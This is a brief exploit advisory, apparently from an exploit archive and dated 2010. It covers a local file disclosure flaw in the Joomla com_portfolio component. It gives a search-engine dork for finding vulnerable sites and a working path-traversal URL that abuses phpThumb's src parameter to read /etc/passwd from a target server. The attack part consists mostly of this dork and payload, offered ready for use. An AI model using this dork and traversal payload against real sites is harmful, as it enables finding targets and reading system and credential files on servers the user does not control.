Joomla Component com_portfolio Local File Disclosure

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_portfolio Local File Disclosure
# Published : 2010-04-21
# Author : Mr.tro0oqy
# Previous Title : WB News (Webmobo) 2.3.3 Stored XSS
# Next Title : User Invoices Persistent XSS Vulnerability in CactuShop

Joomla compnent com_portfolio Local File Disclosure

author : Mr.tro0oqy from comunity college :(

email : t.4@windowslive.com

greetz:alzomer , Mr.ksoory , R3d-D3vil from palstine .. 

dork :inurl:index.php?option=com_portfolio

exp:

http://server/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=../../../../etc/passwd